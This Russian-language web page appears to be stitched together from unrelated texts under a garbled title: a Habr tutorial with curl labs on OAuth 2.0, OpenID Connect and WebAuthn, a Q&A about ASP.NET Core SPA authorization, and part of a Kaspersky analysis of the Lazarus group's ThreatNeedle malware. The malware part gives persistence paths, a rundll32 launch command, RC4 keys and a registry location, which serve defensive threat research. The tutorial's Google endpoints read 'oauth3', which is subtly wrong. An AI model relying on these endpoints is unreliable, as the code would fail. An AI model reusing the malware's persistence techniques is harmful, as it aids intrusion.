Asp key как назвать бизнес login: OAuth 2.0, OpenID Connect, WebAuthn / Хабр

Содержание

OAuth 2.0, OpenID Connect, WebAuthn / Хабр

Пускать или не пускать? Вот в чем вопрос…

Сейчас на многих сайтах мы видим возможность зарегистрироваться или войти с помощью соцсетей, а некоторые сайты предлагают использовать внешние ключи безопасности или отпечатки пальцев. Что это? Стандарты с хорошо проработанной безопасностью или проприетарные реализации? Можем ли мы доверять этим технологиям и использовать их для разработки сайтов и в повседневной жизни? Давайте разбираться. Итак, сейчас существуют несколько стандартов и технологий для идентификации пользователей OAuth 2.0,OpenID Connect, WebAuthn, SAML 2.0, Credential Management API и др. В статье я расскажу о трех наиболее перспективных протоколах OAuth 2.0, OpenID Connect и WebAuthn. И чтобы понять как их применять на практике, сделаем три лабораторные работы. В качестве платформ для идентификации пользователей будем использовать GitHub и Google, на которых у большинства есть аккаунты.



OAuth 2.0

Начнем с самого известного протокола OAuth 2.0. Он был опубликован в 2012 году, как RFC 6749:

The OAuth 2.0 Authorization Framework

.

С помощью OAuth 2.0 пользователь разрешает определенному сайту получить свои закрытые данные из соцсетей, но без передачи сайту своих логинов / паролей. Например, когда вы регистрируетесь на сайте через Facebook, то как раз и предоставляете этому сайту разрешение получить из Facebook ваше имя, e-mail адрес и другие закрытые данные.

Давайте разберемся с технической реализацией. Для простоты я буду называть любой сайт, который хранит идентификационные данные пользователя Соцсетью. А MySite буду называть любой сайт или приложение, которое хочет получить данные пользователя из Соцсети.

Стандарт определяет следующие роли:

  • Resource Owner — пользователь, который заходит на MySite и дает ему разрешение использовать свои закрытые данные из Соцсети.
  • Client (он же MySite) — приложение или интернет сайт, которым пользуется пользователь и которое взаимодействует с Authorization Server и Resource Server для получения закрытых данных пользователя.
  • Authorization Server — сервер который проверяет логин/пароль пользователя, он же Соцсеть.
  • Resource Server — хранит закрытую пользовательскую информацию, которую можно получить с помощью API. Authorization Server и Resource Server могут быть совмещены в одну систему.

Authorization flow


  • Перед началом авторизации необходимо зарегистрировать MySite в Соцсети:
  • Разработчик MySite задает Name (имя приложения), Homepage (адрес домашней страницы MySite) и Callback (адрес, на который Соцсеть перенаправит пользователя после успешной авторизации)
  • Соцсеть выдает Client ID (иногда его называют AppID) и Client Secret.
  • Client ID и Client Secret разработчик должен прописать в своем Client.

Теперь сам процесс. Детали конкретных реализаций могут различаться, но общая логика будет всегда следующая:

  1. Resource Owner заходит на Client (MySite), выбирает опцию “войти с помощью Соцсети”, сайт перенаправляет пользователя в Cоцсеть на Authorization Server.
  2. Authorization Server проверяет есть ли у пользователя активная сессия и, если нет, то показывает форму для логина.
  3. Resource Owner вводит свои логин/пароль и подтверждает, что определенные закрытые данные могут быть использованы MySite, например имя пользователя или e-mail адрес.
  4. Authorization Server проверяет пользователя и перенаправляет на адрес Callback с результатом аутентификации и “Authorization Code”
  5. В ответ Client посылает “Authorization Code”, Client ID и Client Secret.
  6. Authorization Server проверяет присланные данные и формирует “access token” в формате JWT (JSON Web Token), подписанный своим приватным ключом. В этом же JWT может содержаться и “refresh token”, c помощью которого возможно восстановление сессии после ее окончания.
  7. После этого Client может запросить закрытую информацию пользователя с помощью вызова API, в который передается “access token”.
  8. Resource Server проверяет “access token” (например, используя открытый ключ Authorization Server) и предоставляет доступ к данным пользователя.

OAuth 2.0 Лабораторная работа (GitHub)

Существует множество инструкций, как реализовать OAuth 2.0 авторизацию, используя соцсети. Мне лично понравилась следующая статья:

Authentication using GitHub OAuth 2.0 with NodeJS

В ней подробно описаны шаги и приведена тестовая программа. Но, чтобы действительно осознать алгоритм, лучше пройти все шаги руками (http запросами из браузера или вызовами curl). Поехали.

Для начала регистрируем свое приложение на GitHub: github.com/settings/applications/new

Задаем параметры:

Чтобы авторизация работала в рамках собственного сайта адреса должны быть реальными, но для лабораторной работы это не обязательно.

Получаем от GitHub:

  • Client ID: ab8ec08a620c2
  • Client Secret: e6fdd52b0a99e8fbe76b05c1b7bb93c1e

Разумеется во всех лабораторных работах все значения фейковые.

Так выглядит получение Client ID и Secret на сайте GitHub:

Теперь начинаем авторизацию. Считаем, что Шаг 1 уже пройден: пользователь зашел на MySite и выбрал “Войти с помощью GitHub ”. Шаг 2 из call flow — это вызов в REST формате:

https://github.com/login/oauth/authorize?client_id=ab8ec08a620c2
  • адрес — это точка логина на GitHub
  • client_id — это Client ID, выданный при регистрации

В результате этого вызова GitHub показывает окно для авторизации:

Шаг 3: Вводим логин/пароль для доступа на GitHub

Шаг 4: GitHub перенаправляет запрос на Homepage, в этом запросе мы видим code:

http://MySite/home?code=a29b348f63d21

По данному адресу нет работающего сайта, но для нас главное знать присланный code, чтобы сформировать следующий Шаг 5:

https://github.com/login/oauth/access_token?client_id=ab8ec08a620c2&
client_secret=e6fdd52b0a99e8fbe76b05c1b7bb93c1e&
code=a29b348f63d21

  • адрес — это точка получения access token на GitHub
  • client_id — это Client ID, выданный при регистрации
  • client_secret это Client Secret, выданный при регистрации
  • code — это только что присланный code

Шаг 6: В ответ получили access token:

access_token=31b71cbd372acdbb20ec1644b824f3dd0&scope=&token_type=bearer

Шаг 7: Вставляем access_token в заголовок запроса и вызоваем GitHub API:

curl -H "Authorization: token 31b71cbd372acdbb20ec1644b824f3dd0" https://api.github.com/user

Шаг 8: В ответ получаем JSON с полезной информацией обо мне, которую можно использовать для формирования профиля на MySite:

{
  "login": "AlexeySushkov",
  "html_url": "https://github.com/AlexeySushkov",
  "repos_url": "https://api.github.com/users/AlexeySushkov/repos",
  "name": "Alexey Sushkov",
  "blog": "http://sushkov.ru",
  "location": "St.Petersburg, Russia",
  "email": "[email protected]",
и т.д.
}  

На самой деле, мы рассмотрели только один сценарий работы OAuth 2.0. Существует несколько сценариев, каждый из которых используется в зависимости от приложения, соображений безопасности, способу развертывания и т.д. Описание всех сценариев можно найти, например, тут:

OAuth 2.0 in a Nutshell

.

OpenID Connect

С OAuth 2.0 немного разобрались. Теперь выясним зачем нужен OpenID Connect, который является надстройкой над OAuth 2.0:

  • C помощью OAuth 2.0 мы только авторизовали пользователя т.е. о пользователе мы знаем только access token, с помощью которого можем получать определенные данные из Соцсети. Но access token ничего не говорит о личности пользователя и с помощью него мы не можем предоставить доступ к закрытым данным пользователя на нашем сайте MySite. OpenID Connect — добавляет сведения о логине и профиле пользователя (identity). Это как раз и позволяет реализовать его аутентификацию.
  • OpenID Connect также добавляет возможность динамической регистрации и обнаружения сервисов “service discovery”. Это дает возможность строить системы SSO (Single Sign-On), в которых используется один логин для многих не связанных между собой сервисов.

Давайте посмотрим на стандарт с технической стороны.

OpenID Connect (OIDC) — открытый стандарта OpenID, который разрабатывает консорциум OpenID Foundation. OIDC расширяет OAuth 2.0 следующими основными возможностями:

  • Authorization Server, помимо access token и refresh token, возвращает “identity token” (ID Token). Он содержится в том же JWT. Из ID Token можно извлечь следующую информацию: имя пользователя, время входа в учетную запись, срок окончания действия ID Token. ID Token можно передавать между участниками.
  • OIDC предоставляет дополнительное API, которые позволяет запрашивать информацию о пользователе и его текущих сессиях.

Диаграмма взаимодействия в OpenID Connect выглядит так же, как и в случае OAuth. Единственная разница в содержимом запросов:

  • В первичном запросе на получение code добавляется дополнительный атрибут scope=openid.
  • В результате работы алгоритма Client, помимо access и refresh token, получает ID Token.

OpenID Connect: Лабораторная работа (Google)

Теперь посмотрим, чем нас по данной теме порадует Google. Есть подробная инструкция по конфигурации и использованию

OpenID Connect от Google

и “песочница” по использованию Google API:

Google OAuth 2.0 Playground

.

Здесь, как и в случае с OAuth 2.0, мы пройдем путь по шагам и посмотрим на приходящие данные. Аналогично считаем, что приложение зарегистрировано, Client ID и Client Secret получены, Шаг 1 пройден. Шаг 2 из call flow — это вызов в REST формате:

https://accounts.google.com/o/oauth3/v2/auth?
response_type=code&
client_id=140797064495-b8b79j42m97nkkrlndfstikv8.apps.googleusercontent.com&
scope=openid%20email&
redirect_uri=http%3A//c18529.shared.hc.ru/wp-login.php&
state=765439764

У Google немного посложнее, т.к. безопасности они уделяют больше внимания:

  • адрес — это точка логина на Google
  • response_type=code — ожидаем получить в ответ code
  • client_id — Client ID, выданный при регистрации
  • scope=openid email — к каким данным мы хотим получить доступ
  • redirect_uri — redirect_uri заданный при регистрации приложения
  • state — сгенерированное Client-ом число, которое передается между Client и AS для защиты от вмешательства злоумышленника.

Шаг 3: Форма ввода пароля отсутствует, т.к. я уже был залогинен в Google.

Шаг 4: Google перенаправляет запрос на Homepage, в этом запросе мы видим code:

http://MySite?state=123&code=4/xAFkcMzhyJhUErRJYwIyntSYN-WeJjfZHLiwWL4IaT-WkHzMU18xABlPmev-M_87wVbqTkQ1y93w6GB5&scope=email+openid+https://www.googleapis.com/auth/userinfo.email&authuser=0&prompt=none

Также как и в случае с GitHub по данному адресу нет работающего сайта, но это и не надо, нам главное знать code, чтобы сформировать следующий Шаг 5. Тут тоже немного посложнее, т.к. Google требует запрос POST, а не GET:

curl -d "code=4/xAFkcMzhyJhUErRJYwIyntSYN-WeJjfZHLiwWL4IaT-WkHzMU18xABlPmev-M_87wVbqTkQ1y93w6GB5&client_id=140797064495-b8b79j42m97nkkrlndfstikv8.apps.googleusercontent.com&
client_secret=HMVctrTicW6RC1Q8T&
redirect_uri=http%3A//c18529.shared.hc.ru/wp-login.php&
grant_type=authorization_code" 
-H "Content-Type: application/x-www-form-urlencoded" -X POST https://oauth3.googleapis.com/token

  • адрес — это точка получения token на Google
  • code — это только что присланный code
  • client_id — это Client ID, выданный при регистрации
  • client_secret это Client Secret, выданный при регистрации
  • grant_type=authorization_code — единственно правильное значение из стандарта

Шаг 6: В ответ получили access_token и id_token:

{
  "access_token": "ya29.Il_AB0KeKnjBJx0dhjm2nCLt1B-Mq0aQBW5T302JnlZfsxW1AXqLFfDJZRMi2R2WKG4OX4msKLjx4E4CSl4G_4ajAy3aqrf4pM0ic0jJr092pA67H9aktJktCbx",
  "expires_in": 3327,
  "scope": "openid https://www.googleapis.com/auth/userinfo.email",
  "token_type": "Bearer",
  "id_token": "eyJhbGciOiJSUzI1NiIsImtpZCI6IjE3ZDU1ZmY0ZTEwOTkxZDZiMGVmZDM5MmI5MWEzM2U1
………………………………много_букв…………………………………………………….._4mUTiMNSAHljap1hLD2hAzgOZWuQ"
}

Что теперь делать с этим богатством?

Шаг 7: C access_token все понятно: включаем его в вызов API, например GMail:

curl -H "Authorization: Bearer ya29.a0Adw1xeWvFoxHKNICHnV6vFFj5TZdPQVlYD98h8wjW95ZEbHVui_pk7HGRoq3Q7MlVLV23xkVM0yyjSP8ClSlvfUy3b_IqvKQW5Lvwj38QzJhee-ah2grerB4pRpMzn_FGueigG_RGI56pKPgFBTr49cpynQy" https://www.googleapis.com/gmail/v1/users/[email protected]/profile

Шаг 8: В ответ получаем JSON с полезной информацией:

{
 "emailAddress": "[email protected]",
 "messagesTotal": 372543,
...
}

Теперь давайте проверим утверждение, что в id_token содержится информация для аутентификации пользователя и поддержания сессии. Для этого надо расшифровать содержимое. Самый простой способ сделать это, обратиться к Google API по адресу


oauth3.googleapis.com/tokeninfo

и в качестве параметра указать полученный id_token:

https://oauth3.googleapis.com/tokeninfo?id_token=eyJhbGciOiJSUzI1NiIsImtpZCI6IjE3ZDU1ZmY0ZTEwOTkxZDZiMGVmZDM5MmI5MWEzM2U1NGMwZTIxOGIiLCJ0eXAiOi
………………………много_букв……………………………...
SVQ5GQni3irfOzOXYEiqijp6TjGa_a-3jKcEsU5TbasZmAIejsdVcNy2_4mUTiMNSAHljap1hLD2hAzgOZWuQ

Получили JSON:

{
  "iss": "https://accounts.google.com",
  "email": "[email protected]",
  "email_verified": "true",
  "iat": "1583257010",
  "exp": "1583260610",
  "typ": "JWT"
...
}

Видим, что в id_token содержится информация о логине пользователя, времени получения и времени жизни токена. Можно сделать вывод, что OpenID Connect от Google работает, и его можно применять для соответствующих сценариев.

WebAuthn


Web Authentication API

(also known as WebAuthn):

  • Стандарт дает пользователям возможность идентифицироваться на сайтах и в приложениях с помощью внешних ключей безопасности (например, USB-ключей) или по отпечатку пальца и, впоследствии, по другим биометрическим данным: лицу, сетчатке глаза.
  • Основная задача стандарта — избавить пользователей от логинов / паролей и перейти на идентификацию с помощью криптографии с использованием публичных ключей «Public key cryptography». Public key cryptography — это криптографическая концепция, использующая пары математически связанных ключей. Private key (закрытый ключ) хранится в безопасном месте у пользователя, а public key (открытый ключ) хранится и используется открыто.
  • Над стандартом работют организации W3C (World Wide Web Consortium) и FIDO, при участии Google, Mozilla, Microsoft, Yubico. W3C дал миру стандарты HTTP, HTML, XML и многие другие. Наличие таких серьезных игроков говорит о большом потенциале стандарта WebAuthn. WebAuthn поддерживается в следующих браузерах: Chrome, Firefox, Edge, Safari.

Роли

По сравнению с OAuth 2.0 в WebAuthn добавляются роли:

Authenticator: внешний ключ безопасности (физический носитель или сканер отпечатков пальцев), который позволяет аутентифицировать пользователя, использую различные технологии, такие как BlueTooth/NFC/USB. Служит для:

  • Генерации public key credentials (пар открытых / закрытых ключей).
  • Authenticator безопасно хранит закрытый ключ в своей памяти
  • Передает открытый ключ внешним системам
  • Подписывает данные закрытым ключом и результат передает внешним системам

Для взаимодействия с браузером Authenticator использует протокол CTAP (Client to Authenticator Protocols).

Relying Party: выполняет ту же функцию, что и “Authorization Server” в OAuth 2.0, а именно проверяет идентификационные данные пользователя. Только в OAuth 2.0 это были логин/пароль, а в WenAuthn — public key credentials.

User Agent: объединяет браузер и сетевое приложение, служит для тех же целей, что и Client в OAuth 2.0, а именно — с одной стороны взаимодействует с пользователем и предоставляет ему GUI, а с другой стороны взаимодействует с системами, в которых хранятся идентификационные данные пользователя.

Authorization flow

Перед началом процесса аутентификации, также как и в OAuth 2.0, надо совершить подготовительные действия, только в OAuth 2.0 мы регистрировали приложение, а в WebAuth 2.0 регистрируем пользователя. В Web Authentication API специфицировано два вызова:

  • navigator.credentials.create — для создания идентификационных данных пользователя
  • navigator.credentials.get — осуществляет проверку идентификационных данных пользователя

Соответственно, для регистрации надо вызвать navigator.credentials.create.

В результате этого в Authenticator-е пользователя сохранится закрытый ключ для определенного сайта, а в Relying Party сохранится открытый ключ.

После этого процесс аутентификации будет таким:

  1. Зарегистрированный пользователь заходит на сайт и в форме логина выбирает войти с помощью “WebAuthn”. На сайте будет написано, конечно, не WebAuthn, а “войти по отпечатку пальца” или “войти с помощью внешнего ключа”. Приложение делает на Relying Party запрос Challenge. Challenge — имеет тот же смысл, что и Code в OAuth 2.0.
  2. Relying Party присылает Challenge. Этот обмен не регламентируется стандартом, но обычно используется формат REST API.
  3. Взаимодействие браузера и Authenticator-а происходит по протоколу CTAP (Client to Authenticator Protocols). Браузер вызывает navigator.credentials.get c параметрами:
    • Challenge
    • Дополнительные атрибуты
  4. Authenticator ищет идентификационные данные пользователя, опционально запрашивает у пользователя подтвердить, что он это он.
  5. Если проверка прошла успешно, то Authenticator возвращает подписанные приватным ключом данные.
  6. Приложение посылает подписанные данные на Relying Party.
  7. Relying Party расшифровывает данные с помощью открытого ключа, проверяет Challenge и авторизует пользователя.

Для закрепления материала делаем лабораторную работу:

WebAuthn: Лабораторная работа (Google)

Для реализации WebAuthn только http запросами не обойтись, т.к. нужно вызывать браузерное API для взаимодействия с Authenticator-ом. Но и тут Google радует, сделали песочницу с пошаговой инструкцией:

Your first WebAuthn

.

В результате выполнения работы получится JS клиент-серверное приложение, которое реализует аутентификацию с помощью отпечатка пальца. Работающая дема находится по адресу.

Если ее запустить на смартфоне с датчиком отпечатков пальцев, то можно посмотреть результат работы. Как обычно, сначала подготовка — регистрируем пользователя:

Создаем логин / пароль и далее привязываем отпечаток пальца:

После этого программа показывает какой открытый ключ привязан к этому отпечатку:

Теперь можно начинать сценарий по аутентификации. Как обычно, считаем, что Шаг 1 пройден и мы находимся на сайте. Чтобы перейти к Шагу 2 надо нажать “Try Reauth”. Браузер выполнит Шаг 3 и вступит во взаимодействие с Authenticator-ом, который на Шаге 4 попросит приложить палец:

И если приложен зарегистрированный палец, то Шаги 5 и 6 успешно пройдут и на Шаге 7 приложение опять покажет окно с соответствующим открытым ключом:

Заключение

Итак, мы рассмотрели три наиболее распространенных и перспективных протокола для идентификации пользователей: OAuth 2.0, OpenID Connect, WebAuthn. Поняли области их применимости:

  • OAuth 2.0 — используется для регистрации и входа пользователей на сайты с помощью соцсетей. А также для получения данных пользователей из соцсетей.
  • OpenID Connect — используется для аутентификации пользователей и позволят предоставить им доступ к своим закрытым данным на сайтах. Также OpenID Connect служит для реализации сложных сценариев взаимодействия в корпоративных SSO системах.
  • WebAuthn — используется для добавления на сайт возможности аутентификации с помощью внешнего физического ключа или отпечатка пальца.

Выводы


  • Очевидно, что современный сайт должен реализовать все возможные способы регистрации и авторизации, чтобы у пользователя был осознанный выбор.
  • Появилась возможность никогда не хранить пароль пользователя, чтобы не компрометировать свою репутацию, а хранить только логины и зашифрованные личные данные.
  • Имеет смысл отдать аутентификацию пользователей облачным платформам, таким как Facebook или Google, т.к. в них работают лучшие специалисты по безопасности, которые могут предусмотреть все нюансы безопасности.
  • Предлагаю с оптимизмом смотреть в будущее, т.к. протокол WebAuthn — реальный шанс избавится от парольного ада нашего времени!

It’s only the beginning!

Приложение: остальные протоколы идентификации

Для полноты картины перечислю остальные актуальные протоколы и технологии, используемые для идентификации пользователей:

SAML 2.0 (Security Assertion Markup Language)

Зрелый протокол 2005 года, но имеет ограниченный набор сценариев для построения систем SSO. Использует формат данных на основе XML. Подробнее можно посмотреть в статье:

“Кто использует протокол аутентификации SAML 2.0”

Credential Management API

Разработкой занимается та же организация, что и WebAuthn — W3C.

Стандарт Credential Management

позволяет:

  • Хранить идентификационные данные абонентов, что позволяет пользователям заходить на сайты не вводя пароли, а использовать пароли из хранилища.
  • Выбирать нужные аккаунты для входа на определенные сайты.
  • Позволяет использовать логины /пароли, введенные на одном устройстве на других устройствах.

Пример реализации Credential Management API, известный всем — это диспетчер паролей в Google:

passwords.google.com

Initiative for Open Authentication (OATH)


OATH Resources

Полный список протоколов, построенных на базе OAuth 2.0


c# — Как правильно «готовить» авторизацию в SPA?

Цель такая: написать бэкенд ASP.Net Core MVC* SPA для работы с ReactJS и дальнейшей возможностью переиспользовать существующий API для создания, скажем, Android приложения.
Платформа: .Net Core 2.1.

* — Если такое ещё можно назвать MVC, учитывая, что View не будет, а будет отдельная директория ClientApp со всем содержимым фронтэнда.

Пошуршав интернеты, наткнулся на то, что ASP.Net Core Identity не актуален. Звучит логично, учитывая, что тот сильно опирается на куки, а при общении через API куки таскать неудобно. Хотя многие примеры нижеупомянутого JWT всё же используют IdentityUser.

Много инструкций с использованием JWT. Приличная часть из них слишком зациклена на фронтенд реализации и практически ничего не говорит о бэкенде. Не нашёл примеров с OAuth3, везде свой велосипед, причём Demo и не пригодный для реального использования.
В тех же примерах по JWT используются Issuer, Audience и SecretKey, но ни слова о том, по каким правилам их надо выбирать и/или генерировать, ну и где безопасно хранить (если исключить примеры с хардкодом, то их обычно хранили в appsettings.json).

Также в процессе гугления (конкретно: попытке найти инфу об JwtSecurityTokenHandler из System.IdentityModel.Tokens) MSDN Microsoft выдаёт:

We’re no longer updating this content regularly. Check the Microsoft Product Lifecycle for information about how this product, service, or technology is supported.

Что это значит? Microsoft более не поддерживает JWT? Технология в принципе уже неактуальна? Что же тогда использовать?

В итоге мне теперь не совсем понятно как строить авторизацию в своём приложении:

  • Нужные ли мне IdentityUser из Microsoft.AspNetCore.Identity?
  • Нужен ли мне IdentityDbContext из Microsoft.AspNetCore.Identity.EntityFrameworkCore?
  • Актуален ли JWT?
  • Как построить авторизацию с OAuth3?

Хотелось бы сохранить доступность авторизованного пользователя из HttpContext.User и к его Claims, чтобы не мучать БД лишний раз для получения Id/UserName/Avatar/LastOnline/etc.

А также учесть то, что активно будут использоваться роли пользователей.

UPD: Немного обновлю конечные цели, чтобы стало понятнее:

  • Это форум с разделами, постами и комментариями в формате вопрос-ответ
  • Реализация фронтенда через SPA
  • Планируется открытое API
  • Это же API будет использовать SPA
  • Поддержка быстрой регистрации/входа через сторонние сервисы (Vk, FB, Google, etc.)

Lazarus атакует оборонную промышленность с помощью ThreatNeedle

«Lazarus атакует оборонную промышленность с помощью вредоносного ПО ThreatNeedle» (PDF)

Lazarus можно назвать самой активной APT-группировкой 2020 года. В течение года мы наблюдали многочисленные атаки этой преступной группировки на компании из различных отраслей экономики. Группа по исследованию угроз Google (Google TAG) недавно опубликовала заметку о кампании группировки Lazarus, мишенями которой стали исследователи безопасности. Изучив вопрос, мы пришли к выводу, что вредоносное ПО, примененное в этих атаках, принадлежит к семейству, которое мы называем ThreatNeedle. Мы уже сталкивались с атаками Lazarus на организации из различных отраслей с применением этого кластера вредоносного ПО.

В середине 2020 года мы обнаружили, что группировка Lazarus изменила направленность своих атак, запустив атаки на оборонную промышленность с использованием вредоносных программ ThreatNeedle, относящихся к кластеру вредоносного ПО Manuscrypt (также известен как NukeSped). В процессе расследования этой активности нам удалось изучить жизненный цикл атак, обнаружив при этом новые технические подробности и связи с другими кампаниями этой группировки.

В целенаправленных фишинговых рассылках группировка использовала тематику COVID-19 и персональные данные сотрудников атакуемых организаций, собранные из общедоступных источников. После первоначального внедрения в систему, атакующие собирали учетные данные и заражали другие компьютеры в сети компании-жертвы, пытаясь найти в ней критически важные элементы. Мы проследили, как им удалось преодолеть сегментацию сети, получив доступ к машине, выполнявшей функцию внутреннего маршрутизатора, и настроив на ней прокси-сервер, – это дало атакующим возможность выводить на свой удаленный сервер данные, украденные из изолированного сегмента сети компании-жертвы, не имевшего прямого соединения с интернетом. На сегодняшний день от этих атак пострадали организации более чем из десятка стран.

Более того, основываясь на полученных результатах, стало возможно разобраться, как данные атаки связаны с другими кампаниями группировки Lazarus. В ходе этого расследования мы получили возможность взглянуть на содержимое серверов управления вредоносным ПО группировки Lazarus. Злоумышленники применяли различные серверы управления для разных этапов атаки, а также повторно использовали несколько скриптов, которые мы видели в предыдущих атаках Lazarus.

Полная версия статьи доступна на Kaspersky Threat Intelligence. Подписчики сервиса «Лаборатории Касперского» могут обратиться по адресу: [email protected]
За дополнительной информацией вы можете обратиться по адресу: [email protected]

Первоначальное заражение

В качестве вектора начального заражения была использована целенаправленная рассылка фишинговых писем. Перед началом атаки злоумышленники изучили публичную информацию об атакуемой организации и установили адреса электронной почты, принадлежащие различным подразделениям атакуемой компании.

На адреса электронной почты нескольких подразделений атакуемой организации были отправлены фишинговые письма, содержащие вредоносные документы Microsoft Word или ссылки на такие документы, размещённые на удаленном сервере. В качестве контента фишингового письма злоумышленники выбрали одну из наиболее актуальных на сегодня тем: информационные сообщения о коронавирусной инфекции COVID-19. Письма были тщательно подготовлены и написаны от имени медицинского центра, входящего в состав атакованной организации.

Фишинговое письмо, содержащее ссылки на вредоносные документы

Злоумышленниками были зарегистрированы аккаунты на одном из публичных сервисов электронной почты. Имена аккаунтов были выбраны таким образом, чтобы адреса электронной почты отправителя были схожи с настоящим адресом электронной почты медицинского центра. В подписи к фишинговому письму содержались реальные персональные данные заместителя главного врача медицинского центра атакованной организации. Эти данные злоумышленники могли взять с веб-сайта медицинского центра.

Вредоносный код, предназначенный для загрузки и запуска в системе другого вредоносного ПО, содержался в виде макроса внутри документа Microsoft Word.

Текст в документе-приманке был скопирован из статьи одной из клиник, размещенной в интернете в открытом доступе, и содержал информацию о программе диспансеризации населения. Он не относился напрямую к тематике фишингового письма (COVID-19), что говорит о том, что злоумышленники, возможно, не до конца понимают смысл использованного ими контента.

Содержимое вредоносного документа

Как показало наше расследование, первоначальная атака не достигла цели в связи с тем, что на атакованных системах было отключено выполнение макросов Microsoft Office. Чтобы убедить пользователей включить выполнение макросов, злоумышленники отправили еще одно письмо с объяснением того, как включить выполнение макросов в Microsoft Office.

Письмо с инструкцией по включению выполнения макросов №1

После отправки приведенного выше письма с объяснениями злоумышленники поняли, что на атакованном предприятии используется другая версия Microsoft Office с несколько иным порядком включения выполнения макросов. Они отправили ещё одно письмо с описанием правильного порядка действий и скриншотом, сделанным с русифицированной версии приложения.

Письмо с инструкцией по включению выполнения макросов №2

Текст писем из первой целенаправленной фишинговой рассылки, осуществленной злоумышленниками в период с 21 по 26 мая 2020 года, был грамотным и не содержал ошибок. Однако в ходе дальнейшей переписки с жертвой атакующие неоднократно допускали в тексте писем ошибки, указывающие на то, что они, возможно, не являются носителями русского языка и используют автоматические средства перевода текстов.

Письмо с ошибками в тексте

3 июня 2020 года одно из вредоносных вложений было открыто сотрудниками атакованной организации, и в 9:30 утра по местному времени злоумышленники получили удаленный контроль над зараженной системой.

В одной из рассылок фишинговых писем, которая проводилась 19 мая 2020 года, злоумышленники использовали вредоносный документ, который уже был ранее замечен в атаках группировки Lazarus. Речь идёт о документе с именем Boeing_AERO_GS.docx, который загружает шаблон с удаленного сервера.

При этом так и не удалось найти вредоносную нагрузку, создаваемую данным вредоносным документом. Мы предполагаем, что злоумышленники не смогли заразить компьютер с его помощью по неизвестным нам причинам. Через несколько дней на том же компьютере был открыт другой вредоносный документ. Злоумышленники безвозвратно удалили эти файлы с диска после первичного заражения, поэтому получить их не удалось.

Тем не менее, вредоносный документ, связанный с данным вредоносным ПО, удалось получить с помощью наших систем телеметрии. Он создает вредоносную нагрузку и файл ярлыка, затем выполняет вредоносную нагрузку, используя следующие параметры командной строки:

  • Путь к файлу вредоносной нагрузки: %APPDATA%\Microsoft\Windows\lconcaches.db
  • Путь к файлу ярлыка: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk

После этого вредоносная программа запускается с использованием следующих параметров командной строки (отметим, что для каждого образца вредоносного ПО используется свой, уникальный и заранее заданный в коде программы набор аргументов командной строки):

rundll32.exe [dllpath],Dispatch n2UmQ9McxUds2b29

В тексте документа, использованного в данной рассылке фишинговых писем, содержится описание вакансии инженера по обслуживанию генераторов / энергетика.

Текст документа, использованного в рассылке

Компоненты вредоносного ПО

После открытия вредоносного документа пользователем и разрешения выполнения макросов, вредоносная программа извлекает на диск компоненты вредоносного ПО и переходит к многоэтапной процедуре развертывания. Вредоносное ПО, примененное в рамках данной кампании, относится к известному кластеру, который мы назвали ThreatNeedle. Мы относим ThreatNeedle к семейству вредоносных программ Manuscrypt (также известно как NukeSped), которое принадлежит группировке Lazarus. Ранее мы наблюдали использование этого кластера группировкой Lazarus в атаках на криптовалютные бизнесы и компанию-разработчика игр для мобильных телефонов. Несмотря на известность как процесса заражения, так и применяемого вредоносного ПО, и отсутствие в том и другом серьезных изменений, группировка Lazarus продолжала активно применять вредоносное ПО ThreatNeedle на протяжении всей этой кампании.

Процедура заражения

В результате процедуры развертывания загрузчик ThreatNeedle распаковывает и запускает в зараженной системе бэкдор – модуль, находящийся только в оперативной памяти и использующийся для скрытого удалённого управления зараженной системой. С его помощью злоумышленники выполняют первоначальную разведку и развертывают дополнительное вредоносное ПО для заражения других компьютеров в сети предприятия. Для заражения других компьютеров в сети злоумышленники применяют другой компонент вредоносного ПО ThreatNeedle – инсталлятор. Инсталлятор отвечает за установку уже упомянутого ранее загрузчика ThreatNeedle и его регистрацию в автозапуске для закрепления в системе. Известно несколько вариантов загрузчика ThreatNeedle. Основная задача загрузчика – загрузка в оперативную память вредоносного ПО ThreatNeedle последнего этапа (бэкдора).

Инсталлятор ThreatNeedle

После запуска вредоносное ПО расшифровывает внедрённую строку, зашифрованную алгоритмом RC4 (ключ: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4), и сравнивает ее со строкой «7486513879852». В случае если пользователь запускает данное вредоносное ПО без параметра командной строки, оно открывает легитимную программу – калькулятор с темной пиктограммой популярной франшизы «Мстители» (The Avengers).

Далее вредоносное ПО случайным образом выбирает имя службы, используя netsvc, и применяет его для формирования пути, по которому будет расположен файл вредоносной программы. Также вредоносное ПО создает в системной директории файл с именем bcdbootinfo.tlp, содержащий информацию о времени заражения системы и выбранном случайным образом имени службы. Мы обнаружили, что оператор вредоносного ПО проверяет данный файл, чтобы определить, заражена ли удаленная система, и если да, то когда.

Далее с использованием алгоритма RC4 расшифровывается следующий компонент вредоносной программы, который сохраняется в текущую папку в XML-файле со случайным пятисимвольным именем. Затем этот файл копируется в системную директорию с расширением .sys.

Данный файл содержит загрузчик ThreatNeedle. Для расшифровки этого модуля используется отдельный ключ RC4 (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20). После распаковки на диск описываемый компонент вредоносного ПО регистрируется как служба Windows и запускается. Также вредоносная программа сохраняет конфигурационные данные, зашифрованные алгоритмом RC4, в специальном ключе реестра:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description

Загрузчик ThreatNeedle

Данный компонент отвечает за загрузку в память бэкдора ThreatNeedle – вредоносной программы для скрытого удалённого управления зараженной системой. Различные вариации загрузчика ThreatNeedle имеют разные способы расшифровки и загрузки бэкдора в оперативную память зараженной системы:

  • Загрузка компонента вредоносной программы из реестра.
  • Загрузка бэкдора из исполняемого файла загрузчика после расшифровки RC4 и распаковки.
  • Загрузка бэкдора из исполняемого файла загрузчика после расшифровки AES и распаковки.
  • Загрузка бэкдора из исполняемого файла загрузчика после распаковки.
  • Загрузка бэкдора из исполняемого файла загрузчика после выполнения операции XOR с однобайтовым ключом.

